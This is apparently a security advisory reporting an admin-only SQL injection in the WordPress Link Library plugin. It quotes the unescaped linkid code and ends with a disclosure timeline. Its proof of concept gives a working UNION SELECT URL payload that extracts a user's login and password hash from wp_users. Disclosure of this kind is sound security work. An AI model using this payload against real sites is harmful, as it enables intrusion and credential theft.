Homepage:
https://wordpress.org/plugins/link-library/
Description:
Type user access: is accessible only admin user.
$_GET[‘linkid’] is not escaped. Attack with Sql Injection
File / Code:
Path: /wp-content/plugin/link-library/link-library-admin.php
Line: 686
if ( isset( $_GET['genthumbsingle'] ) || isset( $_GET['genfaviconsingle'] ) ) { $linkquery .= " AND l.link_id = " . $_GET['linkid']; } $linkitems = $wpdb->get_results( $linkquery );
Proof of Concept
1 – Login with admin user:
2 – Url attack:
http://localhost:8080/wp-admin/admin.php?page=link-library&genthumbsingle=1&linkid=1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,CONCAT(user_login,char(58),user_pass),17,18,19,20,21,22,23,24,25,26+FROM+wp_users+WHERE+ID=1
3 – Result:
Timeline:
- 14/08/2017 – Discovered
- 14/08/2017 – Vendor finded
- 14/08/2017 – Correct to version 1.2.1